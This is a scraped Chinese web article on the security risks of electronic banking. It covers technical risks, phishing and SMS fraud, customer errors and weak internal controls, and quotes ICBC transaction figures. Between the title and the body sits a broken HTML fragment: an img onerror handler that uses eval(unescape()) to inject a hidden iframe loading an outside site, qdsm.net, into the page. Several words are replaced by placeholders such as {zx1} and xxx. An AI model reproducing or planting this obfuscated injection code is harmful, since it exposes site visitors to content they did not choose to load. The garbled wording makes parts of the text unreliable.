电子银行安全风险防范

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zh_160_600.html%20frameBorder%3D0%20width%3D160%20scrolling%3Dno%20height%3D600%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

当前，我国各家商业银行的电子银行业务正在快速发展，不少银行相继成立了电子银行部，把电子银行作为未来主要的发展方向。电子银行业务是指银行通过手机、电视、电话、电脑、ATM等电子渠道向公、私客户提供金融产品和服务的过程，已在我国商业银行各项业务中占有重要的地位。

今年上半年，工商银行电子银行业务共实现电子银行交易额22.9万亿元，其中网上银行交易额20.9万亿元，电子银行业务笔数17.4亿笔，占同期全行业务量的25.7%。然而，随着电子银行业务的快速发展，其安全问题也日益突出，短信诈骗、黑客入侵、病毒爆发、内控漏洞等问题使电子银行的发展面临着严峻的考验。

一、电子银行面临的主要安全风险

商业银行开展电子银行业务，目的是通过应用{zx1}的科学技术实现业务再造，为客户提供更多的便利和增值服务，进而推进各项业务的快速发展。然而，电子技术的应用在降低商业银行经营成本的同时，也带来了一系列的安全问题，主要表现在两个方面：

1、技术风险。技术风险包括技术漏洞风险、系统设计风险和恶意攻击风险等等。技术漏洞风险主要指商业银行在进行业务改造时所选择的信息技术还不够成熟、完善，存在一些安全隐患，从而会极大地影响计算机系统运行的稳定性，致使各项金融业务难以正常开展，给商业银行带来信誉或实际的损害。系统设计风险是指在设计电子银行系统时，所选用的软件或硬件不匹配，存在缺陷或冲突，导致系统在运行过程中出现中断所造成的损失。恶意攻击风险是指电子银行系统受到外部的恶意攻击，如计算机病毒发作、电脑黑客入侵等，造成系统瘫痪或机密信息失窃，是电子银行面临的最主要的技术风险。

2、业务风险。电子银行的业务风险主要包括客户操作风险和内部控制风险。由于电子银行的很多业务都需要使用者具备一定的操作技能，如果客户操作不熟练，就有可能产生误操作，产生操作风险；还有一些客户的安全意识不强，将自己的xxx账号和密码告诉他人，或在ATM机上取款后，随处丢弃回单，给犯罪分子可乘之机；更严重的是不少犯罪分子利用短信、邮件、假银行网站等方式骗取客户的xxx信息，xx客户资金，给客户造成了巨大的损失。内部控制风险是指由于我国商业银行内控制度建设滞后于金融电子化的发展，信息系统安全管理的基本框架、管理机制、策略方法和工作流程还不完善，一些制度得不到认真执行，导致银行内部人员违规操作或伺机作案，给电子银行安全运行造成风险。